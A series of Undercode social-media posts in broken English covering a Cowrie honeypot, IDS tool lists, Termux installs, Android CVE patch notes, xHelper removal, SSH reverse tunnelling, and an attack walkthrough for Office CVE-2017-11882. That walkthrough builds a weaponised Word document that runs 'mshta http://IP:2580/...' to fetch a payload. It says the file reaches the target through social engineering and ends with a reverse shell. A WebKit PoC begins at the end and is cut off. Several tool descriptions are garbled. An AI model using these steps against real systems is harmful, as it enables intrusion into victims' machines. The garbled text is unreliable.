▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑To run an external (third party, copied) "WORKING" php script : On Termux
Twitter.com/UndercodeNews
After installing php

1) Pkg updates

2) Sudo pkg install php

3) save your (executable) script.php in /storage/
example : in /storage/emulated/0/Documents/...FULL...PATH.../
(and other files.txt used by the script, if necessary)


4) Then in Termux App,
>
cd /storage/emulated/0/Documents/...FULL...PATH.../
>
php script.php

5) BUT ... before,
"It is necessary to grant storage permission for Termux on [your device with] Android 6 and higher.
Use 'Settings>Apps>Termux>Permissions>Storage' and set to true."

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 malwares Setup 2020
An SSH Honeypot >Cowrie is a medium interaction SSH and Telnet honeypot, which can log brute force attacks and an attacker’s shell interaction
pinterest.com/Undercode_Testing

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Change the Port You’ll Use to Administer the Server
Cowrie will be listening for SSH connections on port 22. You’ll want to configure the SSH service to listen on a different port for you to connect to and administer the server.

2)sudo vi /etc/ssh/sshd_config
Under # What ports, IPs and protocols we listen for, change the port number to 3393 or your preferred port number.

3) Write your changes and quit vi.
Ctrl + C

4) Restart the SSH service.

5) service ssh restart

6) By running the command below, you can see that the server is now listening for connections on port 3393.

7) netstat -tan

> Proto Recv-Q Send-Q Local Address Foreign Address State
tcp0 0 0.0.0.0:3393 0.0.0.0:* LISTEN

🦑 Install and Configure Cowrie

1) Download updated package lists.

> sudo apt-get update

2) Install Cowrie’s dependencies.

> sudo apt-get install python2.7 git virtualenv libmpfr-dev libssl-dev libmpc-dev libffi-dev build-essential libpython-dev python-pip

3) Add a new user named, cowrie.

4) sudo adduser — disabled-password cowrie

5) Switch to the new user, cowrie

> sudo su — cowrie

6) Navigate to the home directory of user, cowrie, and clone the cowrie git repository.
> git clone https://github.com/micheloosterhof/cowrie.git

7) Create a new Python virtual environment for cowrie.

8) cd cowrie

9) virtualenv cowrie-env

10) Activate the virtual environment.

> source cowrie-env/bin/activate

11) The terminal will display (cowrie-env) before the username, cowrie.

12) Install pycrypto, Crypto and other requirements.

13) pip install pycrypto Crypto
(cowrie-env)$ pip install -r requirements.txt

14) Generate a key for the cowrie instance.

15) cd data
ssh-keygen -t dsa -b 1024 -f ssh_host_dsa_key
cd ..

16) export PYTHONPATH=/home/cowrie/cowrie
Additional Cowrie Configuration

17) Make a copy of the config file for your new cowrie instance.

18) cd /home/cowrie/cowrie/

19) cp cowrie.cfg.dist cowrie.cfg
vi ./cowrie.cfg

20) Set the hostname in the configuration file to a server name of your choice. E.g. fileserver4

21) Change the Port to listen for incoming SSH connections to port 22.

22) Write your changes and quit vi.
Ctrl + C
:wq

23) Enable authbind in cowrie’s start.sh file.
sudo vi /home/cowrie/cowrie/start.sh

Change line 2 to read:
AUTHBIND_ENABLED=yes

24) sudo apt-get install authbind

25) sudo touch /etc/authbind/byport/22

26) sudo chown cowrie /etc/authbind/byport/22

27) sudo chmod 777 /etc/authbind/byport/22

🦑 Start Cowrie

1) Execute the following commands to start Cowrie.

2) sudo su cowrie

3) cd /home/cowrie/cowrie/
source cowrie-env/bin/activate

4) ./start.sh

5) Verify cowrie is listening on port 22 by running the command below.
netstat -tan
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN

6) Execute the following command to stop Cowrie.
./stop.sh

Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Usefull Tools for IDS / IPS / Host IDS / Host IPS 2020
instagram.com/UndercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Snort - Snort is a free, open source intrusion prevention system (NIPS) and network intrusion detection system (NIDS), created by Martin Roche Snort is currently under development. Sourcefire, founded by Roesch and CTO. In 2009, Snort entered the OpenWork InfoWorld Hall of

2) Fame as one of the “greatest [open source] software samples of all time”.

3) Bro - Bro is a powerful network analysis infrastructure that is very different from the typical IDS you may know.

4) OSSEC - Integrated HIDS open source. Not for the faint of heart. It takes a little to understand how this works. Performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time notification, and an active response. It works on most operating systems, including Linux, MacOS, Solaris, HP-UX, AIX, and Windows. Lots of reasonable documentation. Sweet spot - medium to large deployment.

5) Suricata - Suricata is a high-performance mechanism for monitoring
network IDS, IPS and network security. Open Source and belongs to the public non-profit foundation Open Foundation Security Foundation (OISF). Suricata was developed by OISF and its suppliers.

6) Security Onion - Security Onion is a Linux distribution for intrusion detection, network security monitoring and log management. It is based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert,

7) Snorby, ELSA, Xplico, NetworkMiner and many other security tools. The easy-to-use installation wizard allows you to create an army of distributed sensors for your enterprise in minutes!

8) sshwatch - IPS for SSH is similar to DenyHosts written in Python. It can also collect information about an attacker during an attack in a log.

9) Stealth - Check file integrity, which leaves virtually no residue. The controller starts from another computer, which makes it difficult for an attacker to know that the file system is checked at certain pseudorandom intervals via SSH. Highly recommended for small to medium deployments.

11) AIEngine - AIEngine is an interactive / programmable next-generation Python / Ruby / Java / Lua package checker with training capabilities without any human intervention, NIDS (network intrusion detection) System) functionality, DNS domain classification, network collector, network forensics and much more.

12) Denyhosts - Prevent SSH dictionary attacks and brute force attacks.
Fail2Ban - scans log files and performs actions at IP addresses that show malicious behavior.

13) SSHGuard - a service security software in addition to SSH written in C
Lynis is an open source security audit tool for Linux / Unix.

Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 COMMUN VIRUS-MALWARES 2020 top
twitter.com/UndercodeNews

1) Damn Simple Honeypot (DSHP) - Honeypot framework with pluggable handlers.

2) NOVA - uses honeypots as detectors, looks like a complete system.

3) OpenFlow Honeypot (OFPot) - Redirects traffic for unused IP addresses to a honeypot built on POX.

4) OpenCanary - A modular and decentralized honeypot daemon that runs several Canary versions of services and warns when (ab) is in use.
low- ciscoasa_honeypot Honeypot for a Cisco ASA that can detect CVE-2018-0101, DoS vulnerabilities, and remote code execution.
miniprint - Honeypot mid-interaction printer.

🦑 Botnet C2 Tools

1) Hale - Botnet management and control monitor.

2) dnsMole - analyzes DNS traffic and potentially detects botnet commands and monitors server activity, as well as infected hosts.

3) IPv6 attack detection tool

ipv6 attack detector is a Google Summer of Code 2012 project supported by the Honeynet Project.
dynamic code toolkit

4)Frida - Add JavaScript to explore native applications on Windows, Mac, Linux, iOS, and Android.
A tool for converting a site into server decoys

5) HIHAT - Convert arbitrary PHP applications to high-level Honeypots web interfaces.
malware collector

6) Kippo-Malware is a Python script that downloads all malicious files stored as URLs in the Kippo SSH honeypot database.
Distributed Deployment Sensor

7) Modern Honey Network - Multiple snort and honeypot sensor management, uses a network of virtual machines, small SNORT installations, hidden dioneas and a centralized server for management.

🦑Network analysis tool

1) Tracexploit - play network packets.

2) Anonymizer Journal

3) LogAnon - Anonymous logging library that helps ensure anonymous logs are consistent between logs and network captures.
Low-interaction Honeypot (router back door)

4) Honeypot-32764 - Honeypot for the back door of the router (TCP 32764).

5) WAPot - Honeypot that can be used to monitor traffic directed to home routers.

6) Honeynet Farm Traffic Redirector

Honeymole - Deploying multiple sensors that redirect traffic to a centralized collection of honey pots.

7) HTTPS Proxy

mitmproxy - allows you to intercept, verify, modify and play traffic flows.

🦑System hardware

1) Sysdig - An open-source system-level study allows you to record the status and activity of a system from a running GNU / Linux instance, and then save, filter, and analyze the results.

2) Fibratus - A tool for researching and tracking the Windows kernel.
Honeypot for malware distribution via USB

3) Ghost-usb - Honeypot for malware spreading through USB storage devices.

🦑 Data collection

1) Kippo2MySQL - Extracts some very simple statistics from Kippo text log files and inserts them into a MySQL database.

2) Kippo2ElasticSearch is a Python script for transferring data from the

3) Kippo SSH honeypot MySQL database to an ElasticSearch instance (server or cluster).

4) Passive Network Audit Framework Parser

[Passive Network Audit Infrastructure (pnaf)] ( https://github.com/jusafing/pnaf ) is a platform that combines several passive and automated analysis methods to provide an assessment of the security of network platforms.

🦑 VM monitoring and tools

1) Antivmdetect - Script to create templates for use with VirtualBox to make VM detection more difficult.

2) VMCloak - Automatically create a virtual machine and mask for a cuckoo sandbox.
[vmitools] ( http://libvmi.com/ ) is a C library with Python bindings that makes it easy to track the low-level details of a running virtual machine.

🦑 binary debugger

1) Hexgolems - the server part of the debugger Pint - the server part of the debugger and the LUA shell for the PIN code.

2) Hexgolems - external interface of the debugger Schem - external interface of the debugger.

ALL THOSE AVAIBLE AT GITHUB WILL WROTE SOME TUTORIALS FOR those
Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Deface topic script Deface is a library that allows you to customize HTML (ERB, Haml and Slim) views in a Rails application without editing the underlying view.

> It allows you to easily target html & erb elements as the hooks for customization using CSS selectors as supported by Nokogiri. Rails plugin that allows you to customize ERB views in a Rails application without editing the underlying view updated in 2019
http://pinterest.com/Undercode_testing

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) on linux os clone https://github.com/spree/deface

2) go dir

3) Ensure that your layout views include doctype, html, head and body tags in a single file, as Nokogiri will create such elements if it detects any of these tags have been incorrectly nested.

4) Parsing will fail and result in invalid output if ERB blocks are responsible for closing an HTML tag that was opened normally, i.e. don't do this: &lt;div <%= ">" %>

5) Gems or Spree Extensions that add overrides to your application will load them in the order they are added to your Gemfile.

6) Applying an override to a view that contains invalid markup (which, occasionally happens in Spree views) can break rendering that would normally pass a browser's own permissive rendering. This is because the nokogiri library takes it upon itself to correct the issue, which doesn't happen prior to applying deface. Sometimes that correction changes the rendering of the view in an unintended manner, appearing to break it. The easiest way to tell if this is the cause of an issue for you is to put your view into http://deface.heroku.com/ and diff the output with the html which rails renders without your override. If you see a difference in the structure of the html, you may have invalid markup in your view which nokogiri is correcting for you. See Spree issue #1789 for an example of what may be wrong in a view.

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 The Best Antiviruses for Linux in 2020:
twitter.com/UNDERCODEnews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Bitdefender GravityZone Business Security – Best for Businesses
www.bitdefender.com

2) Comodo Antivirus for Linux – Best for Home Users
> https://www.comodo.com/home/internet-security/antivirus-for-linux.php

3) ESET NOD32 Antivirus for Linux – Best for New Linux Users (Home)
> www.eset.com

4) Kaspersky Endpoint Security for Linux – Best for Hybrid IT Environments (Business)
> https://me-en.kaspersky.com/small-business-security?redef=1&THRU&reseller=me-en_meta-ksos_acq_ona_sem_bra_onl_b2c__psrch_______&utm_source=google&utm_medium=branded&utm_campaign=ksos-15&ksid=fb29975b-4f58-4bce-8b22-1697c3e77cf9&ksprof_id=434&ksaffcode=305783&ksdevice=c&kschadid=214581515961&kschname=google&kpid=Google|822220295|45727109471|214581515961|kwd-299077543916|c&gclid=EAIaIQobChMIhonei-jG5wIVSdHeCh0nPwlREAAYAiAAEgLYPvD_BwE

5) recommended for ubunto servers- sofos antivirus
> https://www.sophos.com/en-us/products/free-tools/sophos-antivirus-for-linux.aspx

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Topic 2019-2020 termux scripts: configurable prompt builder for Bash and ZSH
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

a) Termux

>< apt update

> apt install gbt

b) Arch Linux

> yaourt -S gbt

> Or install gbt-git if you would like to run the latest greatest from the master branch.

🦑 CentOS/RHEL
Packages hosted by Packagecloud):

echo '[gbt]
name=GBT YUM repo
baseurl=https://packagecloud.io/gbt/release/el/7/$basearch
gpgkey=https://packagecloud.io/gbt/release/gpgkey
https://packagecloud.io/gbt/release/gpgkey/gbt-release-4C6E79EFF45439B6.pub.gpg
gpgcheck=1
repo_gpgcheck=1' | sudo tee /etc/yum.repos.d/gbt.repo >/dev/null
sudo yum install gbt
Use the exact repository definition from above for all RedHat-based distribution regardless its version.

🦑 Ubuntu/Debian/kali

> Packages hosted by Packagecloud):

1) curl -L https://packagecloud.io/gbt/release/gpgkey | sudo apt-key add -

2) echo 'deb https://packagecloud.io/gbt/release/ubuntu/ xenial main' |

3) sudo tee /etc/apt/sources.list.d/gbt.list >/dev/null

4) sudo apt-get update

5) sudo apt-get install gbt

6) Use the exact repository definition from above for all Debian-based distribution regardless its version.

🦑 Mac
Using Homebrew:

1) brew tap jtyr/repo

2) brew install gbt

3) Or install gbt-git if you would like to run the latest greatest from the master branch.

E N J O Y
@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Termux-Webpentest... tool
> txtool is made to help you for easly pentesting in termux,
t.me/UndercOdeTesting

1) git clone https://github.com/kuburan/txtool.git

2) cd txtool

3) apt install python2

4) ./install.py

5) Mtxtool

@UndercOdeTesting

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑2020 all Android Cve - VULNERABILITIES TO GAIN ACCESS ON ANY ANDROID :
twitter.com/UndercodeNews

> CVE References Type Severity Updated AOSP versions

1) CVE-2020-0014 A-128674520 EoP High 8.0, 8.1, 9, 10

2) CVE-2020-0015 A-139017101 EoP High 8.0, 8.1, 9, 10

3) CVE-2019-2200 A-67319274 EoP High 10

4) CVE-2020-0017 A-123232892 [2] ID High 8.0, 8.1, 9, 10

5) CVE-2020-0018 A-139945049 ID High 8.0, 8.1, 9, 10

6) CVE-2020-0020 A-143118731 ID High 10

7) CVE-2020-0021 A-141413692 [2] [3] DoS High 10

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Let s Start with First Android Vulnerabilitie :
instagram.com/UndercodeTesting

🦑 CVE-2020-0014 A-128674520 EoP High 8.0, 8.1, 9, 10 :

1) RESTRICT AUTOMERGE
Make toasts non-clickable

2) Since enforcement was only on client-side, in Toast class, an app could

3) use reflection (or other means) to make the Toast clickable. This is a
security vulnerability since it allows tapjacking, that is, intercept touch
events and do stuff like steal PINs and passwords.

🦑This CL brings the enforcement to the system by applying flag
FLAG_NOT_TOUCHABLE.

Test: atest CtsWindowManagerDeviceTestCases:ToastTest
Test: Construct app that uses reflection to remove flag FLAG_NOT_TOUCHABLE and
log click events. Then:

1) Observe click events are logged without this CL.

2) Observer click events are not logged with this CL.

Bug: 128674520

Change-Id: Ic36585bc4f186e0224f5b687c49c0b3d9266838c
(cherry picked from commit b81f269ae2afb446b9d4a909fc2bcf038af00c41)

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 CVE-2020-0015 A-139017101 EoP High 8.0, 8.1, 9, 10
Android bug details :
instagram.com/UndercodeTesting

1) KeyChain: Do not allow hiding Cert Install dialog

2) Do not allow apps to float a window on top of the certificate
installation / naming dialog.

3) This obscures the CA certificate installation dialog and could be used
to trick a user into installing a CA certificate.

4) This is fixed by adding the HIDE_NON_SYSTEM_OVERLAY_WINDOWS system
flag when the activity is created (onCreate), so that another activity
starting in the foreground would not be able to obscure the dialog.

Bug: 139017101
Test: Manual, with an app that floats a window.
Change-Id: Iff8e678743c3883cf1f7f64390097a768ca00856
(cherry picked from commit afdacb2ec4c5cdc2fb2a9943fa5b48100f4725c8)


@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑NOW ANDROID SYSTEM BUGS SUCH BLUETOOTH-SOFTWARE BUGS ANDROID 7-8-9
twitter.com/UndercodeNews



🦑 CVE References Type Severity Updated AOSP versions


1) CVE-2020-0022 A-143894715 DoS Moderate 10

> GAP: Correct the continuous pkt length in l2cap

L2cap continuous pkt length wrongly calculated in
reassembly logic when remote sends more data
than expected.

Wrong pkt length leading to memory corruption

Hence the Correct the continuous pkt length in
l2cap reassembly logic.

Bug: 135239489
Bug: 143894715
CRs-Fixed: 2434229
Test: make and internal testing
Change-Id: I758d9e31465b99e436b9b1841320000f08186c97
Merged-In: I758d9e31465b99e436b9b1841320000f08186c97
(cherry picked from commit 337bd4579453bd6bf98ff519de3ac1019cd30d28)
(cherry picked from commit 602f4b44fe30ec8b225e1cee5f96817607d93e5a)


2) RCE Critical 8.0, 8.1, 9
CVE-2020-0023 A-145130871 ID Critical 10
>Enforce BLUETOOTH_PRIVILEGED in setPhonebookAccessPermission

Bug: 145130871
Test: POC
Merged-In: Ib4985e18de9f6695acc371da78deb240d42671f1
Change-Id: I3b8897166e223179fcbcf8c7a64e0c4d4ca974ef
(cherry picked from commit 8d1e8979f56acfe477bd3b84994a716a8391a8eb)


3) CVE-2020-0005 A-141552859 EOP High 8.0, 8.1, 9, 10

4) CVE-2020-0026 A-140419401 EoP High 8.0, 8.1, 9, 10

5) CVE-2020-0027 A-144040966 EoP High 8.0, 8.1, 9, 10

6) CVE-2020-0028 A-122652057 [2] ID High 9

🦑hope after all those and more bugs coming for android, may you figured out the meaning of: ''NOTHING SAFE''

🦑For any doubt feel free to ask us

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is X-Helper Virus ? and why is dangerous ?
twitter.com/UndercodeTesting
🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) xHelper is an Android malware that was detected by security vendor Malwarebytes in May 2019. This is a covert malware removal program. Even after the user restores the factory settings, the malware will be re-infected, causing continuous trouble to users around the world.

2) Malwarebytes' security researchers have been studying the threat, and in a recent blog post, the team stated that, although it has not been clear how the malware reinstalls itself, they have indeed found sufficient information about how it operates. Information to permanently delete it and prevent xHelper from reinstalling itself after a factory reset.

3) According to the Malwarebytes team, xHelper found a way to use a process in the Google Play Store app to trigger a reinstall. With a special directory created on the device, xHelper can hide its Android application package (APK) on disk. Unlike apps, their directories and files remain on Android mobile devices even after a factory reset. Therefore, the device will continue to be infected until the directories and files are deleted.

4) Malwarebytes explained in its analysis of the malware, "Google Play is not infected with malware. However, certain events in Google Play triggered a re-infection-it could be something is being stored. In addition, some things may Google Play acts as a smoke screen, disguising itself as a source of malware installation, when it actually comes from elsewhere. "

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Method to remove xHelper Virus :
fb.com/UndercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

It is worth noting that the following removal steps rely on the user to install the Malwarebytes app for Android, but the app is free to use.

> The specific deletion steps are as follows:

1) Install a file manager from Google PLAY, which can search for files and directories.

2) Amelia uses ASTRO's File Manager.

3) Disable Google PLAY temporarily to stop reinfection.

4) Go to Settings> Apps> Google Play Store

5) Press the disable button to run a scan in Malwarebytes for Android to remove xHelper and other malware.

6) Manual uninstallation can be difficult, but the names to look for in the Application information are fireway, xhelper, and Settings (only if two settings applications are displayed). Open the file manager and search for anything that starts with com.mufc .
If found, note the last modified date.

> Pro tip: Sort by date in file manager
7) In ASTRO's file manager, you can delete everything starting with com.mufc sorted by date under view settings . And anything with the same date (except for core directories such as Download):

8) now Re-enable Google PLAY

9) Go to Settings> Apps> Google Play Store

10) Press the enable button

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Intranet penetration using SSH reverse tunnel FULL BY UndercOde :
twitter.com/Undercodenews

1) No matter it is infiltration or in the open air, intranet penetration is an important link. We and our assigned intranet IP cannot be accessed through the extranet. SSH reverse tunnel for intranet penetration.

2) Suppose machines A and B, A has a public IP, and B is behind NAT and has no available port forwarding. Now I want to initiate an SSH connection to B from A. Because B is behind the NAT, there is no such combination of public IP + port available , so A cannot penetrate NAT. This article deals with this situation. Also encountered by most people.

3) Let's first assume the following machines:

Machine code Machine position address Account ssh / sshd port Do you need to run sshd
A Public network a.site usera twenty two Yes
B Behind NAT localhost userb twenty two Yes
C Behind NAT localhost userc twenty two no
SSH direction tunnel connection

4) This method refers to the active establishment of an SSH tunnel from B to A, which forwards port 6766 of A to port B. As long as the tunnel is not closed, this forwarding is effective. You only need to access A's 6766 port to connect to B in reverse.

🦑 First establish an SSH tunnel on B, and forward port 6676 of A to port 22 of B:

1) B $ ssh -p 22 -qngfNTR 6766: localhost: 22 usera@a.site
Then use 6766 reverse SSH to B on A

2) A $ ssh -p 6766 userb @ localhost
The thing to do is actually that simple.

3) Maintenance of the tunnel

Stability maintenance
> Unfortunately, the SSH connection will be closed overtime. If the connection is closed and the tunnel cannot be maintained, then A cannot use the reverse tunnel to penetrate B's NAT. Therefore, we need a solution to provide a stable SSH To the tunnel.

4) One of the easiest methods is autossh. This software will automatically establish an SSH tunnel after a timeout. This solves the problem of tunnel stability. If you use Arch Linux, you can get it like this:

> $ sudo pacman -S autossh


5) Let's do something similar on B before, except that the tunnel will be maintained by autossh:

> $ autossh -p 22 -M 6777 -NR 6766: localhost: 22 usera@a.site
The port specified by the -M parameter is used to monitor the status of the tunnel and has nothing to do with port forwarding.

6) Then you can access B on port 6766 on A:

> $ ssh -p 6766 user @ localhost

7) Automatic tunnel establishment
However, there is another problem. If B restarts the tunnel, it will disappear. Then there needs to be a means autossh to establish an SSH tunnel each time B starts . One idea is to make the service very natural, then it will be given in systemd a solution under the program.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Intranet penetration using SSH reverse tunnel FULL BY UndercOde PART 2 : :
twitter.com/UndercOdenews

𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

🦑"Punch holes"
The reason why the title is this is because I think this thing is a bit similar to UDP hole punching, that is, through a machine on the public network, two machines that are respectively behind each NAT can establish an SSH connection.

1) Here's how to use SSH reverse tunnel to connect C to B.

First edit the configuration file on A , turn on the switch:sshd/etc/ssh/sshd_configGatewayPorts

2) GtaewayPorts yes
Then restart ssh

> A$ sudo systemct1 restart sshd
Then slightly modify the autossh command used on B:

3)B > $ autossh -p 22 -M 6777 -NR '*: 6766: localhost: 22' user@a.site
Then use C's port 6676 to connect to B on C:

C $ ssh -p 6766 user@a.site
So far you have easily penetrated the two layers of NAT

🦑 1) Final solution
Combining the previously mentioned, the final solution is as follows:

2) First turn on the GatewayPorts switch of sshd on A and restart sshd.

3) Then create a new user autossh on B. According to the idea of permission minimization, the autossh service handout on B runs as the user autossh to avoid security problems as much as possible:

1 B $ sudo useradd -m autossh
2 B $ sudo passwd autossh
Then create the SSH key for the autossh user on B and upload it to A:

1 B $ su-autossh
2 B $ ssh-keygen -t; rsa '-C' autossh @ B '
3 B $ ssh-copy-id user@a.site
Be careful not to set a password for this key , that is ssh-keygen , do not enter extra characters despite entering all the way when running the command.

4) Then create a service file called with autossh user privileges on B. Write the following text to the file and set the permissions to 644:autossh/lib/systemd/system/autossh.service

1 [Unit]
2 Description = Auto SSH Tunnel
3 After = network-online.target
4 [Service]
5 User = autossh
6 Type = simple
7 ExecStart = / bin / autossh -p 22 -M 6777 -NR '*: 6766: localhost: 22' usera@a.site -i /home/autossh/.ssh/id_rsa
8 ExecReload = / bin / kill -HUP $ MAINPID
9 KillMode = process
10 Restart = always
11 [Install]
12 WantedBy = multi-user.target
13 WantedBy = graphical.target
Setting network-online.target on B takes effect:

5) B $ systemctl enable NetworkManager-wait-online
If you use systemd-networkd and you need to restart the service, it should be systemd-networkd-wait-online. Then set the service to start automatically:

> B $ systemctl enable autossh
If you like, you can start it immediately after this:

> B $ systemctl start autossh
Then you can use this reverse tunnel on A to penetrate B's NAT SSH connection to B:

> C $ ssh -p 6766 user @ localhost
Or SSH to C directly through two layers of NAT:

> C $ ssh -p 6766 user@a.site
If you are familiar with ssh, you can use this tunnel to do more things. For example, you can specify dynamic port forwarding when connecting backwards:

> C $ ssh -p 6766 -qngfNTD 7677 user@site.a
Joining C is your computer, A is your VPS, and B is your company's computer. If you do the above, then the browser port is set to the sock4 local (localhost) proxy of 7677, and you can see the company's webpage in your home browser.

🦑There are some other things in the home that are not useful, everyone knows. . . . .

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Office Memory Corruption Vulnerability CVE-2017-11882 Failed to execute arbitrary code, DoS PoC has been released:
fb.com/UndercodeTesting

1) Microsoft Office once again revealed a memory corru:ption vulnerability , CVEID CVE-2017-11882 , which can be exploited by an attacker to execute arbitrary code in the context of the currently logged-in user.

2) A failed development attempt may cause a denial of service condition. The affected versions include related versions of Office 2016, Office 2013, Office 2010, and Office 2007.

3) Update: The Microsoft Office Memory Corruption Vulnerability CVE-2017-11882 PoC has been released. The reason it is widely spread is that this vulnerability has no sputum, and users cannot feel it! !! !! Here is a simple reproduction for everyone. .


🦑 Tools used:

1) Infiltration tool: kodiac (used to construct the payload and get the shell) Tool address: https://github.com/weiruyi123/koadic (This is the version I modified without coding errors)

2) Vulnerability Poc: Address: https://github.com/weiruyi123/CVE-2017-11882

(Poc has a limit on the command length. For details, please refer to the README on github.)

🦑 Operating environment:

1) Python2.7

2) Target: windows server 2008 R2 standard IP: 192.168.1.171

3) Attack machine: A VPS with a public IP (because I don't want to do forwarding, I use the VPS as a rebound shell service to show everyone)

4) Enter bash, cd into the downloaded Poc directory, we can see that Poc is written in python, so you need to install the python environment.

Next we open the win server virtual machine

5) Newly installed virtual machine (without any patches).

Here I use ssh to link my vps and use git clone to download kodiac. After recursively adding execute permissions to the directory, cd into the kodiac directory and then. /kodiac.py runs, the same tool also requires a python environment

6)Then we set the LHOST and LPORT mosaics and fill in your intranet IP address (if it is an intranet penetration) or port forwarding address, and then enter run to generate the payload

7) Copy 'mshta http: // IP: 2580 / acg9N' and then go back to bash to open the Poc directory. The usage of Poc is

python Command_CVE-2017-11882.py -c "cmd.exe / c calc.exe" -o test.doc

-c refers to the command executed remotely -o refers to the generated document location. We modify the command and save location at -c according to the situation, here according to the payload command I generated is

python Command_CVE-2017-11882.py -c "mshta http: // IP: 2580 / acg9N" -o test.doc

Of course, you can also use msf to generate a powershell one-sentence payload and then replace the parameter at -c

8) It can be seen that we have successfully generated a malicious document (check picture sended by UndercOde

9) Next, you only need to open it through some social workers or abnormal means. we will open the document into the win server virtual machine.

10) Then you will find that the zombies shell with code 0 has been rebounded at kodiac, and there is no error message after the target is opened

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 iOS Safari WebKit CVE-2017-13785 Remote Code Execution Vulnerability POC:
> twitter.com/UndercodeNews

𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) WebKit is a typesetting engine used by web browsers to draw web pages. It is used in Apple Safari. Its branches are used in Chromium-based web browsers such as Opera and Google Chrome.
PoC:

*/

<style>
* { max-height: 0; -webkit-text-combine: horizontal; -webkit-writing-mode: vertical-rl; }
</style>
<script>
function go() {
